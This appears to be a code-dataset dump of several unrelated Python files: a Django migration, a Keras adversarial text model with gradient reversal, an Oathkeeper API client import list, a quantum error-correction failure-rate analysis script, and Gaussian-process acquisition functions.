text stringlengths 38 1.54M |
|---|
# Generated by Django 3.0.3 on 2020-03-03 13:03
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial migration: creates the DataDb and CompanyDb tables."""

    initial = True

    dependencies = [
        # The user FKs below target the configured (swappable) user model.
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.CreateModel(
            name='DataDb',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('text', models.CharField(blank=True, max_length=200)),
                ('date', models.DateField(null=True)),
                ('Project_Name', models.CharField(max_length=50, null=True)),
                # Nullable owner: a DataDb row may exist without a user.
                ('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.CreateModel(
            name='CompanyDb',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('Project_Name', models.CharField(max_length=50, unique=True)),
                ('Brand_Name', models.CharField(max_length=50)),
                ('Address', models.CharField(blank=True, max_length=255, null=True)),
                ('Phone_Number', models.CharField(blank=True, max_length=10, null=True)),
                ('Email', models.EmailField(blank=True, max_length=50, null=True)),
                ('Created', models.DateTimeField(auto_now_add=True, null=True)),
                ('Type', models.CharField(default='Company Theme', max_length=50)),
                # Required owner: deleting the user cascades to CompanyDb rows.
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
    ]
|
import keras.backend as K
from keras.layers import Dense, Input
from keras.models import Model
from keras.engine import Layer
import tensorflow as tf
from keras.utils import to_categorical
from keras.callbacks import ModelCheckpoint, History
from glob import glob
import numpy as np
from keras.backend.tensorflow_backend import set_session
import os.path
# Reverse gradient layer from https://github.com/michetonu/gradient_reversal_keras_tf/blob/master/flipGradientTF.py
# Added compute_output_shape for Keras 2 compatibility
def reverse_gradient(X, hp_lambda):
    """Flips the sign of the incoming gradient during training.

    Forward pass is the identity; the registered gradient op multiplies
    the incoming gradient by -hp_lambda (TF1 graph-mode override of the
    "Identity" gradient).
    """
    # Each call must register a uniquely named gradient, so count calls
    # on the function object itself.
    try:
        reverse_gradient.num_calls += 1
    except AttributeError:
        reverse_gradient.num_calls = 1
    grad_name = "GradientReversal%d" % reverse_gradient.num_calls

    @tf.RegisterGradient(grad_name)
    def _flip_gradients(op, grad):
        return [tf.negative(grad) * hp_lambda]

    # Fix: the original incremented num_calls a second time here, which
    # skipped every other gradient name; the single increment above is
    # sufficient to keep names unique. Also removed a leftover debug print.
    g = K.get_session().graph
    with g.gradient_override_map({"Identity": grad_name}):
        y = tf.identity(X)
    return y
class GradientReversal(Layer):
    """Flip the sign of gradient during training.

    Identity in the forward pass; on the backward pass the gradient is
    multiplied by -hp_lambda (see reverse_gradient).
    """
    def __init__(self, hp_lambda, **kwargs):
        # hp_lambda: strength of the gradient reversal.
        super(GradientReversal, self).__init__(**kwargs)
        self.supports_masking = False
        self.hp_lambda = hp_lambda
    def build(self, input_shape):
        # Layer has no weights. NOTE(review): newer Keras versions expose
        # trainable_weights as a managed property — confirm this direct
        # assignment still works on the Keras version in use.
        self.trainable_weights = []
    def call(self, x, mask=None):
        return reverse_gradient(x, self.hp_lambda)
    def get_output_shape_for(self, input_shape):
        # Keras 1 API: output shape equals input shape.
        return input_shape
    def compute_output_shape(self, input_shape):
        # Keras 2 API: output shape equals input shape.
        return input_shape
    def get_config(self):
        # Include hp_lambda so the layer can be re-instantiated from config.
        config = {"hp_lambda": self.hp_lambda}
        base_config = super(GradientReversal, self).get_config()
        return dict(list(base_config.items()) + list(config.items()))
class A_BOW_TEST:
    """
    Implements the Adversarial Selector with Bag of Words model (A+BOW)
    from Deconfounded Lexicon Induction for Interpretable Social Science
    using Keras.

    The network predicts the 2-way target from head "y" while a
    gradient-reversed branch regresses a 5-dim confound from head "z";
    per-epoch checkpoints are later re-ranked to select models good at y
    but bad at z.
    """
    def __init__(
        self,
        x_dim,
        hx=100,
        ht=50,
        hc=50,
        inv_factor=1,
        use_ensemble_model=False,
        checkpoint_dir=None,
        p=.1,
        n=5,
    ):
        # x_dim: input feature dimension; hx/ht/hc: hidden sizes of the
        # encoder, y-branch and z-branch; inv_factor: gradient-reversal
        # strength; p: fraction of best-y checkpoints considered during
        # selection; n: ensemble size (forced odd below).
        assert n > 1
        assert p > 0 and p <= 1
        self.x_dim = x_dim
        self.hx, self.ht, self.hc = hx, ht, hc
        self.inv_factor = inv_factor
        self.checkpoint_dir = "/tmp" if checkpoint_dir is None else checkpoint_dir
        if not os.path.isdir(self.checkpoint_dir):
            os.mkdir(self.checkpoint_dir)
        self.use_ensemble_model = use_ensemble_model
        self.p = p
        self.n = n
        # Keep n odd (presumably for majority voting — confirm with callers).
        if self.n % 2 == 0:
            self.n -= 1
        # One weights file per epoch, e.g. abow.00001.hdf5.
        self.cpt_name = os.path.join(self.checkpoint_dir, "abow.{epoch:05d}.hdf5")
        self.mcp = ModelCheckpoint(self.cpt_name, save_weights_only=True)
        self.history = History()
        self.model_paths = None

    def _build_model(self):
        """Build the two-headed adversarial model in a fresh TF session."""
        K.clear_session()
        # Cap per-process GPU memory so several runs can share one device.
        config = tf.ConfigProto()
        config.gpu_options.per_process_gpu_memory_fraction = 0.125
        sess = tf.Session(config=config)
        set_session(sess)
        x_input = Input((self.x_dim,), name="x_input")
        e = Dense(self.hx, activation="relu", name="e")(x_input)
        l = Dense(self.ht, activation="relu")(e)
        t = Dense(2, activation="softmax", name="y")(l)
        # Adversarial branch: gradients from the z head are flipped, so the
        # encoder is pushed away from encoding the confounds.
        l = GradientReversal(self.inv_factor)(e)
        l = Dense(self.hc, activation="relu")(l)
        c = Dense(5, name="z")(l)
        self.model = Model(x_input, [t, c])
        self.model.compile(optimizer="adam", loss=["categorical_crossentropy","mean_squared_error"])

    def fit(self, d, *args, **kwargs):
        """Train with per-epoch checkpointing, then reload selected weights.

        d: dataset-like object with attributes X, y (binary) and z —
        assumed from usage here; confirm against callers.
        """
        self._build_model()
        tocat = lambda x: to_categorical(x, num_classes=2)
        # If validation_data was passed as a dataset object (not a tuple),
        # convert it into the (X, [y, z]) form Keras expects.
        vd = kwargs.get("validation_data", ())
        if type(vd) != tuple:
            kwargs["validation_data"] = (vd.X, [tocat(vd.y), vd.z])
        # fit with checkpointing
        kwargs["callbacks"] = kwargs.get("callbacks", []) + [self.mcp, self.history]
        self.model.fit(d.X, [tocat(d.y), d.z], *args, **kwargs)
        yl, zl = (
            np.array(self.history.history["y_loss"]),
            np.array(self.history.history["z_loss"]),
        )
        # One checkpoint per epoch, numbered from 1.
        nmodels = len(yl)
        model_paths = np.array(
            [self.cpt_name.format(epoch=epoch) for epoch in range(1, nmodels + 1)]
        )
        if self.use_ensemble_model:
            self._select_n_best_models(d, yl, zl, model_paths)
        else:
            self._select_one_best_model(d, yl, zl, model_paths)

    def predict(self, d, *args, **kwargs):
        """Return only the y-head predictions for d.X."""
        return self.model.predict(d.X)[0]

    def _select_n_best_models(self, d, yl, zl, model_paths):
        """Record paths of the n checkpoints best at y and worst at z."""
        nmodels = len(model_paths)
        # keep models in the top 10% performance when predicting y
        k = int(self.p * nmodels)
        midx_list = yl.argsort()[:k]
        # Among those, keep the n with the HIGHEST z loss (most deconfounded).
        zidx_list = zl[midx_list].argsort()[::-1][: self.n]
        self.model_paths = model_paths[midx_list[zidx_list]]
        print("Using ensemble method with models {}".format(self.model_paths))

    def _select_one_best_model(self, d, yl, zl, model_paths):
        """Reload the single checkpoint best at y and worst at z."""
        nmodels = len(model_paths)
        # keep models in the top 10% performance when predicting y
        k = int(self.p * nmodels)
        midx_list = yl.argsort()[:k]
        # keep the model that performs the worst on z
        zidx = zl[midx_list].argmax()
        midx = midx_list[zidx]
        print(
            "Reloading model {} with y loss {} and z loss {}".format(
                model_paths[midx], yl[midx], zl[midx]
            )
        )
        # load the selected model
        self.model.load_weights(model_paths[midx])
# flake8: noqa
# import all models into this package
# if you have many models here with many references from one model to another this may
# raise a RecursionError
# to avoid this, import only the models that you directly need like:
# from ory_oathkeeper_client.model.pet import Pet
# or import this package, but before doing it, use:
# import sys
# sys.setrecursionlimit(n)
from ory_oathkeeper_client.model.create_rule_created import CreateRuleCreated
from ory_oathkeeper_client.model.create_rule_forbidden import CreateRuleForbidden
from ory_oathkeeper_client.model.create_rule_forbidden_body import CreateRuleForbiddenBody
from ory_oathkeeper_client.model.create_rule_internal_server_error import CreateRuleInternalServerError
from ory_oathkeeper_client.model.create_rule_internal_server_error_body import CreateRuleInternalServerErrorBody
from ory_oathkeeper_client.model.create_rule_unauthorized import CreateRuleUnauthorized
from ory_oathkeeper_client.model.create_rule_unauthorized_body import CreateRuleUnauthorizedBody
from ory_oathkeeper_client.model.decisions_forbidden import DecisionsForbidden
from ory_oathkeeper_client.model.decisions_forbidden_body import DecisionsForbiddenBody
from ory_oathkeeper_client.model.decisions_internal_server_error import DecisionsInternalServerError
from ory_oathkeeper_client.model.decisions_internal_server_error_body import DecisionsInternalServerErrorBody
from ory_oathkeeper_client.model.decisions_not_found import DecisionsNotFound
from ory_oathkeeper_client.model.decisions_not_found_body import DecisionsNotFoundBody
from ory_oathkeeper_client.model.decisions_unauthorized import DecisionsUnauthorized
from ory_oathkeeper_client.model.decisions_unauthorized_body import DecisionsUnauthorizedBody
from ory_oathkeeper_client.model.delete_rule_forbidden import DeleteRuleForbidden
from ory_oathkeeper_client.model.delete_rule_forbidden_body import DeleteRuleForbiddenBody
from ory_oathkeeper_client.model.delete_rule_internal_server_error import DeleteRuleInternalServerError
from ory_oathkeeper_client.model.delete_rule_internal_server_error_body import DeleteRuleInternalServerErrorBody
from ory_oathkeeper_client.model.delete_rule_not_found import DeleteRuleNotFound
from ory_oathkeeper_client.model.delete_rule_not_found_body import DeleteRuleNotFoundBody
from ory_oathkeeper_client.model.delete_rule_unauthorized import DeleteRuleUnauthorized
from ory_oathkeeper_client.model.delete_rule_unauthorized_body import DeleteRuleUnauthorizedBody
from ory_oathkeeper_client.model.get_rule_forbidden import GetRuleForbidden
from ory_oathkeeper_client.model.get_rule_forbidden_body import GetRuleForbiddenBody
from ory_oathkeeper_client.model.get_rule_internal_server_error import GetRuleInternalServerError
from ory_oathkeeper_client.model.get_rule_internal_server_error_body import GetRuleInternalServerErrorBody
from ory_oathkeeper_client.model.get_rule_not_found import GetRuleNotFound
from ory_oathkeeper_client.model.get_rule_not_found_body import GetRuleNotFoundBody
from ory_oathkeeper_client.model.get_rule_ok import GetRuleOK
from ory_oathkeeper_client.model.get_rule_unauthorized import GetRuleUnauthorized
from ory_oathkeeper_client.model.get_rule_unauthorized_body import GetRuleUnauthorizedBody
from ory_oathkeeper_client.model.get_well_known_forbidden import GetWellKnownForbidden
from ory_oathkeeper_client.model.get_well_known_forbidden_body import GetWellKnownForbiddenBody
from ory_oathkeeper_client.model.get_well_known_json_web_keys_internal_server_error import GetWellKnownJSONWebKeysInternalServerError
from ory_oathkeeper_client.model.get_well_known_json_web_keys_internal_server_error_body import GetWellKnownJSONWebKeysInternalServerErrorBody
from ory_oathkeeper_client.model.get_well_known_json_web_keys_ok import GetWellKnownJSONWebKeysOK
from ory_oathkeeper_client.model.get_well_known_ok import GetWellKnownOK
from ory_oathkeeper_client.model.get_well_known_unauthorized import GetWellKnownUnauthorized
from ory_oathkeeper_client.model.get_well_known_unauthorized_body import GetWellKnownUnauthorizedBody
from ory_oathkeeper_client.model.health_not_ready_status import HealthNotReadyStatus
from ory_oathkeeper_client.model.health_status import HealthStatus
from ory_oathkeeper_client.model.inline_response500 import InlineResponse500
from ory_oathkeeper_client.model.is_instance_alive_internal_server_error import IsInstanceAliveInternalServerError
from ory_oathkeeper_client.model.is_instance_alive_internal_server_error_body import IsInstanceAliveInternalServerErrorBody
from ory_oathkeeper_client.model.is_instance_alive_ok import IsInstanceAliveOK
from ory_oathkeeper_client.model.json_web_key import JsonWebKey
from ory_oathkeeper_client.model.json_web_key_set import JsonWebKeySet
from ory_oathkeeper_client.model.judge_forbidden import JudgeForbidden
from ory_oathkeeper_client.model.judge_forbidden_body import JudgeForbiddenBody
from ory_oathkeeper_client.model.judge_internal_server_error import JudgeInternalServerError
from ory_oathkeeper_client.model.judge_internal_server_error_body import JudgeInternalServerErrorBody
from ory_oathkeeper_client.model.judge_not_found import JudgeNotFound
from ory_oathkeeper_client.model.judge_not_found_body import JudgeNotFoundBody
from ory_oathkeeper_client.model.judge_unauthorized import JudgeUnauthorized
from ory_oathkeeper_client.model.judge_unauthorized_body import JudgeUnauthorizedBody
from ory_oathkeeper_client.model.list_rules_forbidden import ListRulesForbidden
from ory_oathkeeper_client.model.list_rules_forbidden_body import ListRulesForbiddenBody
from ory_oathkeeper_client.model.list_rules_internal_server_error import ListRulesInternalServerError
from ory_oathkeeper_client.model.list_rules_internal_server_error_body import ListRulesInternalServerErrorBody
from ory_oathkeeper_client.model.list_rules_ok import ListRulesOK
from ory_oathkeeper_client.model.list_rules_unauthorized import ListRulesUnauthorized
from ory_oathkeeper_client.model.list_rules_unauthorized_body import ListRulesUnauthorizedBody
from ory_oathkeeper_client.model.raw_message import RawMessage
from ory_oathkeeper_client.model.rule import Rule
from ory_oathkeeper_client.model.rule_handler import RuleHandler
from ory_oathkeeper_client.model.rule_match import RuleMatch
from ory_oathkeeper_client.model.swagger_create_rule_parameters import SwaggerCreateRuleParameters
from ory_oathkeeper_client.model.swagger_get_rule_parameters import SwaggerGetRuleParameters
from ory_oathkeeper_client.model.swagger_health_status import SwaggerHealthStatus
from ory_oathkeeper_client.model.swagger_json_web_key import SwaggerJSONWebKey
from ory_oathkeeper_client.model.swagger_json_web_key_set import SwaggerJSONWebKeySet
from ory_oathkeeper_client.model.swagger_list_rules_parameters import SwaggerListRulesParameters
from ory_oathkeeper_client.model.swagger_not_ready_status import SwaggerNotReadyStatus
from ory_oathkeeper_client.model.swagger_rule import SwaggerRule
from ory_oathkeeper_client.model.swagger_rule_handler import SwaggerRuleHandler
from ory_oathkeeper_client.model.swagger_rule_match import SwaggerRuleMatch
from ory_oathkeeper_client.model.swagger_rule_response import SwaggerRuleResponse
from ory_oathkeeper_client.model.swagger_rules_response import SwaggerRulesResponse
from ory_oathkeeper_client.model.swagger_update_rule_parameters import SwaggerUpdateRuleParameters
from ory_oathkeeper_client.model.swagger_version import SwaggerVersion
from ory_oathkeeper_client.model.update_rule_forbidden import UpdateRuleForbidden
from ory_oathkeeper_client.model.update_rule_forbidden_body import UpdateRuleForbiddenBody
from ory_oathkeeper_client.model.update_rule_internal_server_error import UpdateRuleInternalServerError
from ory_oathkeeper_client.model.update_rule_internal_server_error_body import UpdateRuleInternalServerErrorBody
from ory_oathkeeper_client.model.update_rule_not_found import UpdateRuleNotFound
from ory_oathkeeper_client.model.update_rule_not_found_body import UpdateRuleNotFoundBody
from ory_oathkeeper_client.model.update_rule_ok import UpdateRuleOK
from ory_oathkeeper_client.model.update_rule_unauthorized import UpdateRuleUnauthorized
from ory_oathkeeper_client.model.update_rule_unauthorized_body import UpdateRuleUnauthorizedBody
from ory_oathkeeper_client.model.upstream import Upstream
from ory_oathkeeper_client.model.version import Version
|
import sys
import json
import math
import itertools as it
import steane as st
import chper_wrapper as wrapper
import qcircuit_functions as qfun
#p1q, p2q = float(sys.argv[1]), float(sys.argv[2])
#ns, nt = float(sys.argv[3]), float(sys.argv[4])
# Error-model selection and output location for the Monte-Carlo results.
error_model = 'ion_trap_eQual3'
output_folder = './MC_results/QECd3_flags/all_flags/ion_trap3/CNOT/'
# Define the error information
# For the subset sampler, these error rates are just place-holders;
# their exact values don't matter.
p1, p2, p_meas, p_prep, p_sm, p_cross, p_5q = 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1
error_dict, Is_after2q, Is_after1q, faulty_groups = wrapper.dict_for_error_model(
    error_model=error_model,
    p_1q=p1, p_2q=p2,
    p_meas=p_meas, p_prep=p_prep,
    p_sm=p_sm, p_cross=p_cross,
    p_5q=p_5q)
# create the latt-surg circuit
#latt_circ = qfun.create_latt_surg_CNOT(False,True,True,False,True,True,True)
#brow.from_circuit(latt_circ, True)
#sys.exit(0)
# Define the list of error-prone gates
# For now, we have 6 groups: (a) preps and meas, (b) MS2, (c) I_idle, (d) I_cross,
# (e) 1-q gates, (f) MS5
#gates_indices = wrapper.gates_list_CNOT_general(latt_circ, faulty_groups)
#print [len(gate_kind) for gate_kind in gates_indices]
#sys.exit(0)
# create the transversal circuit
#CNOT_circ = st.Generator.transversal_CNOT_ion_trap(False, True)
#brow.from_circuit(CNOT_circ, True)
#sys.exit(0)
# Define the list of error-prone gates
# For now, we have 4 groups: (a) I_idle, (b) I_cross, (c) 1-q gates, (d) 2-q MS gates
#circ_list = [CNOT_circ.gates[0].circuit_list[0]]
#gates_indices = wrapper.gates_list_general(circ_list, faulty_groups)
#print [len(gate_kind) for gate_kind in gates_indices]
#sys.exit(0)
def total_perms6(perm_string):
    '''
    Return every distinct ordering of the 6 characters in perm_string,
    each as a list of ints (one fault count per gate group).

    Bug fix: the original did ``new_perm = map(int, list(perm))`` — under
    Python 3, ``map`` returns a lazy iterator, so the ``not in`` dedup
    always succeeded (every map object is distinct) and downstream code
    consuming the iterators (e.g. ``sum(perm)``) would break.
    Materializing with ``list`` restores the Python 2 behavior.
    '''
    list_perms = []
    for perm in it.permutations(perm_string, 6):
        new_perm = list(map(int, perm))
        if new_perm not in list_perms:
            list_perms.append(new_perm)
    return list_perms
def total_perms4(perm_string):
    '''
    Return every distinct ordering of the 4 characters in perm_string,
    padded with a leading and trailing 0 (the prep/meas and 5qMS groups
    have no faults in the transversal circuit), each as a list of ints.

    Bug fix: the original did ``new_perm = map(int, list(perm))`` — under
    Python 3, ``map`` returns a lazy iterator, so ``[0] + new_perm + [0]``
    raises TypeError and the dedup could never work.  Materializing with
    ``list`` restores the Python 2 behavior.
    '''
    list_perms = []
    for perm in it.permutations(perm_string, 4):
        new_perm = [0] + list(map(int, perm)) + [0]
        if new_perm not in list_perms:
            list_perms.append(new_perm)
    return list_perms
# Subset-sampler weight configurations.  Each string gives the number of
# faults in each gate group (6 groups for the lattice-surgery circuit,
# 4 for the transversal circuit), grouped by total fault weight w1..w7.
w1_6, w1_4 = ['100000'], ['1000']
w2_6, w2_4 = ['200000','110000'], ['2000','1100']
w3_6, w3_4 = ['300000','210000','111000'], ['3000','2100','1110']
w4_6, w4_4 = ['400000','310000','220000','211000','111100'], ['4000','3100','2200','2110','1111']
w5_6 = ['500000','410000','320000','311000','221000','211100','111110']
w6_6 = ['600000','510000']
w5_4 = ['5000','4100','3200','3110','2210','2111']
w6_4 = ['6000','5100','4200','4110','3300','3210','3111','2220','2211']
w7_4 = ['7000','6100','5200','5110','4300','4210','4111','3310','3211']
w_6 = w1_6 + w2_6 + w3_6 + w4_6 + w5_6 + w6_6
w_4 = w1_4 + w2_4 + w3_4 + w4_4 + w5_4 + w6_4 + w7_4
# Expand each configuration into all distinct orderings; the zero-fault
# subset is seeded explicitly (total_perms4 output is also length 6, padded).
w_perms6, w_perms4 = [[0,0,0,0,0,0]], [[0,0,0,0,0,0]]
for config in w_6:
    w_perms6 += total_perms6(config)
for config in w_4:
    w_perms4 += total_perms4(config)
# Load the Monte-Carlo failure rates for every fault subset from the JSON
# files written by earlier runs, keyed by the subset tuple.
results_latt = {'pX':{}, 'pZ':{}}
results_trans = {'pX':{}, 'pZ':{}}
total_jsons = 8
runs_per_json = 5000
total_runs = total_jsons*runs_per_json
latt_folder = output_folder + 'latt_surg/noQEC/XZ/'
for perm in w_perms6:
    # Zero faults can never cause a logical failure.
    if sum(perm) == 0:
        results_latt['pX'][tuple(perm)] = 0.
        results_latt['pZ'][tuple(perm)] = 0.
        continue
    perm_folder = latt_folder + '_'.join(map(str,perm)) + '/'
    if sum(perm) == 1:
        # Weight-1 subsets: only a single results file; a lone 5qMS fault
        # (last group) is treated as harmless.
        if perm[-1] == 0:
            abs_filename = perm_folder + '1.json'
            json_file = open(abs_filename, 'r')
            local_dict = json.load(json_file)
            json_file.close()
            results_latt['pX'][tuple(perm)] = local_dict['p_failX']
            results_latt['pZ'][tuple(perm)] = local_dict['p_failZ']
        else:
            results_latt['pX'][tuple(perm)] = 0.
            results_latt['pZ'][tuple(perm)] = 0.
    else:
        # Subsets whose faults are all in the last (5qMS) group are
        # treated as harmless as well.
        if perm[0]==0 and perm[1]==0 and perm[2]==0 and perm[3]==0 and perm[4]==0:
            results_latt['pX'][tuple(perm)] = 0.
            results_latt['pZ'][tuple(perm)] = 0.
        else:
            # Aggregate failure counts over all result files for this subset.
            sum_failX, sum_failZ = 0, 0
            for json_index in range(1,total_jsons+1):
                abs_filename = perm_folder + '%i.json'%json_index
                json_file = open(abs_filename, 'r')
                local_dict = json.load(json_file)
                json_file.close()
                sum_failX += local_dict['n_failsX']
                sum_failZ += local_dict['n_failsZ']
            results_latt['pX'][tuple(perm)] = float(sum_failX)/float(total_runs)
            results_latt['pZ'][tuple(perm)] = float(sum_failZ)/float(total_runs)
# Transversal circuit: one JSON file per subset.
trans_folder = output_folder + 'transversal/noQEC/XZ/'
for perm in w_perms4:
    if sum(perm) == 0:
        results_trans['pX'][tuple(perm)] = 0.
        results_trans['pZ'][tuple(perm)] = 0.
        continue
    abs_filename = trans_folder + '_'.join(map(str,perm)) + '.json'
    json_file = open(abs_filename, 'r')
    local_dict = json.load(json_file)
    json_file.close()
    results_trans['pX'][tuple(perm)] = local_dict['p_failX']
    results_trans['pZ'][tuple(perm)] = local_dict['p_failZ']
# Physical error rates
regime = 'future'
T2 = {'current': 200., 'future': 2000.}  # T2 times in ms
T_SM = {'current': 0.08, 'future': 0.03}  # Separation/merging times in ms
# Per-group physical error rates, ordered:
# prep/meas, 2qMS, SM, cross, 1q, 5qMS
# The SM entry is the dephasing probability accumulated over one
# separation/merging operation; 'p_cross' is a placeholder string that is
# overwritten with the swept value inside the loop below.
n_ps_current = [0.001,
                0.01,
                0.5*(1.-math.exp(-T_SM['current']/T2['current'])),
                'p_cross',
                5.e-5,
                0.05]
n_ps_future = [1.e-4,
               2.e-4,
               0.5*(1.-math.exp(-T_SM['future']/T2['future'])),
               'p_cross',
               1.e-5,
               0.001]
n_ps = {'current': n_ps_current, 'future': n_ps_future}
n_ps = n_ps[regime]
# number of gates in latt-surg CNOT: preps/meas, 2qMS, I_idle, I_cross, 1q, 5qMS.
n_gates_latt = [205, 200, 52908, 827, 428, 33]
# number of gates in transversal CNOT (preps/meas and 5qMS are 0)
n_gates_trans = [7, 1302, 448, 28]
# Sweep the cross-talk error rate p_cross and accumulate lower/upper bounds
# on the logical failure probability for both circuits, then dump a table.
list_ps = [i*1.e-5 for i in range(1,1000)]
output_string = 'descriptor p_cross pCNOT_phys p_lattX_lower p_lattX_upper p_lattZ_lower p_lattZ_upper p_transX_lower p_transX_upper p_transZ_lower p_transZ_upper\n'
for p in list_ps:
    # When generating a Bell pair,
    # the failure rate after a CNOT is 8p/15 for both X and Z errors
    p_CNOT_phys = n_ps[1]*8./15.
    n_ps[3] = p # p is the value of p_cross
    p_occurrence_latt_total, p_occurrence_trans_total = 0., 0.
    p_fail_lattX_lower, p_fail_lattZ_lower = 0., 0.
    p_fail_transX_lower, p_fail_transZ_lower = 0., 0.
    # first the lattice surgery
    for perm in w_perms6:
        p_occurrence_latt = wrapper.prob_for_subset_general(n_gates_latt, perm, n_ps)
        p_occurrence_latt_total += p_occurrence_latt
        p_fail_lattX = results_latt['pX'][tuple(perm)]*p_occurrence_latt
        p_fail_lattX_lower += p_fail_lattX
        p_fail_lattZ = results_latt['pZ'][tuple(perm)]*p_occurrence_latt
        p_fail_lattZ_lower += p_fail_lattZ
    # Upper bound: assume every unsampled subset fails with certainty.
    p_fail_lattX_upper = p_fail_lattX_lower + (1.-p_occurrence_latt_total)
    p_fail_lattZ_upper = p_fail_lattZ_lower + (1.-p_occurrence_latt_total)
    # second transversal
    for perm in w_perms4:
        # The transversal circuit only has the middle four gate groups.
        p_occurrence_trans = wrapper.prob_for_subset_general(n_gates_trans, perm[1:5], n_ps[1:5])
        p_occurrence_trans_total += p_occurrence_trans
        p_fail_transX = results_trans['pX'][tuple(perm)]*p_occurrence_trans
        p_fail_transX_lower += p_fail_transX
        p_fail_transZ = results_trans['pZ'][tuple(perm)]*p_occurrence_trans
        p_fail_transZ_lower += p_fail_transZ
    p_fail_transX_upper = p_fail_transX_lower + (1.-p_occurrence_trans_total)
    p_fail_transZ_upper = p_fail_transZ_lower + (1.-p_occurrence_trans_total)
    if p < 0.003:
        output_string += '%.15f %.15f %.15f %.15f %.15f %.15f %.15f %.15f %.15f %.15f\n' %(p, p_CNOT_phys, p_fail_lattX_lower, p_fail_lattX_upper, p_fail_lattZ_lower, p_fail_lattZ_upper, p_fail_transX_lower, p_fail_transX_upper, p_fail_transZ_lower, p_fail_transZ_upper)
    else:
        # Above threshold only the transversal Z numbers are reported.
        output_string += '%.15f %.15f nan nan nan nan nan nan %.15f %.15f\n' %(p, p_CNOT_phys, p_fail_transZ_lower, p_fail_transZ_upper)
data_filename = 'comparison_latt_trans_failure_%s.dat' %regime
abs_filename = output_folder + data_filename
data_file = open(abs_filename, 'w')
data_file.write(output_string)
data_file.close()
|
import numpy as np
from GPyOpt.acquisitions import AcquisitionBase as GPyOptAcquisitionBase
from src.experiment.config_helpers import ConfigMixin
class AcquisitionBase(ConfigMixin):
    """Base class for acquisition functions; subclasses implement __call__(X)."""
    pass
class AcquisitionModelMismatch(AcquisitionBase):
def __init__(self, *models, beta=2):
assert len(models) == 2, "It can only compute difference between two models."
self.model = models[0]
self.model_compare = models[1]
self.beta = beta
def __call__(self, X):
mean, var = self.model.get_statistics(X, full_cov=False)
mean2, var2 = self.model_compare.get_statistics(X, full_cov=False)
# aggregate hyperparameters dimension
if var.ndim == 3:
mean = np.mean(mean, axis=0)
var = np.mean(var, axis=0)
if mean2.ndim == 3:
mean2 = np.mean(mean2, axis=0)
return np.abs(mean - mean2) + self.beta * np.sqrt(var)
class QuadratureAcquisition(AcquisitionBase):
def __init__(self, model):
self.model = model
def __call__(self, X):
mean, var = self.model.get_statistics(X, full_cov=False)
# aggregate hyperparameters dimension
if var.ndim == 3:
var = np.mean(var, axis=0)
return np.sqrt(var)
# class StableOptAcq(AcquisitionBase):
# """The derivative approach can be seen as the first taylor approximation of this
# (or as the limiting case when delta -> 0).
# So useful when derivatives are not present or when correlation is across bigger distances.
# """
# def __init__(self, *models, beta=2):
# self.model = models[0]
# self.beta = beta
# def __call__(self, X):
# # TODO: maximize perturbation
# mean, var = self.model.get_statistics(X, full_cov=False)
# # aggregate hyperparameters dimension
# if var.ndim == 3:
# mean = np.mean(mean, axis=0)
# var = np.mean(var, axis=0)
# # Notice that we are interested in |∇f(x)|.
# return np.abs(mean) + self.beta * np.sqrt(var)
class CurvatureAcquisition(AcquisitionBase):
def __init__(self, model, use_var=True, beta=0):
self.model = model
self.use_var = use_var
self.beta = beta
def __call__(self, X):
mean, var = self.model.get_statistics(X, full_cov=False)
# aggregate hyperparameters dimension
if var.ndim == 3:
mean = np.mean(mean, axis=0)
var = np.mean(var, axis=0)
hessian_mean, hessian_var = self.model.predict_hessian(X, full_cov=False)
hess_norm = np.linalg.norm(hessian_mean, ord='fro', axis=(-2, -1))
hess_norm = hess_norm[:, None]
# Remove output dimensions
if self.use_var:
return hess_norm * np.sqrt(var) + self.beta * np.sqrt(var)
else:
return hess_norm
class CurvatureAcquisitionDistribution(AcquisitionBase):
"""Use this with MCMC sampling (not maximization).
"""
def __init__(self, model, beta=2):
self.model = model
self.beta = beta
def __call__(self, X):
mean, var = self.model.get_statistics(X, full_cov=False)
# aggregate hyperparameters dimension
if var.ndim == 3:
mean = np.mean(mean, axis=0)
var = np.mean(var, axis=0)
hessian_mean, hessian_var = self.model.predict_hessian(X, full_cov=False)
hess_norm = np.linalg.norm(hessian_mean, ord='fro', axis=(-2,-1))
return hess_norm + self.beta * np.sqrt(var)
class DerivativeAcquisition(AcquisitionBase):
"""Redundant but helpful for structure.
Should be extracted into a multi-object GP.
Usually we are optimizing R^D -> R.
Now R^D -> R^D...
First consider low dim:
- How do we weight the D partial gradients?
Using max we will explore peaks in any direction.
Assume we used mean. If all "the action" was along one dimension this might not be explored.
- Alternatively we could do the aggregation BEFORE fitting a GP thus avoiding multi-objectivity...
- What does exploration/exploitation mean in this setting?
Exploration will now learn an accurately representation of the gradient.
Seems like we will cover the whole domain well in the long run (i.e. not get stuck exploiting).
Now consider high-dim:
(Note: This approach becomes infeasible if dimensionality is not reduced (multi-objective GP is expensive I think!).
For Manifold learning we need gradients to flow through the function transformation.)
Conclusion:
Let's try with multi-objective GP on derivatives and max{mu + beta * var}.
First: 1D.
"""
def __init__(self, *models, beta=2):
self.model = models[0]
self.derivative_model = models[1]
self.beta = beta
def __call__(self, X):
mean, var = self.derivative_model.get_statistics(X, full_cov=False)
# aggregate hyperparameters dimension
if var.ndim == 3:
mean = np.mean(mean, axis=0)
var = np.mean(var, axis=0)
# Notice that we are interested in |∇f(x)|.
return np.abs(mean) + self.beta * np.sqrt(var)
# ------------------ GPyOpt --------------------
class GPyOptQuadratureAcquisition(GPyOptAcquisitionBase):
    """
    Pure-exploration (quadrature) acquisition: the acquisition value is the
    predictive standard deviation s(x); the mean is ignored.
    :param model: GPyOpt class of model
    :param space: GPyOpt class of domain
    :param optimizer: optimizer of the acquisition. Should be a GPyOpt optimizer
    :param cost_withGradients: function
    :param exploration_weight: accepted for signature compatibility; not used here
    .. Note:: does not allow to be used with cost
    """
    analytical_gradient_prediction = False

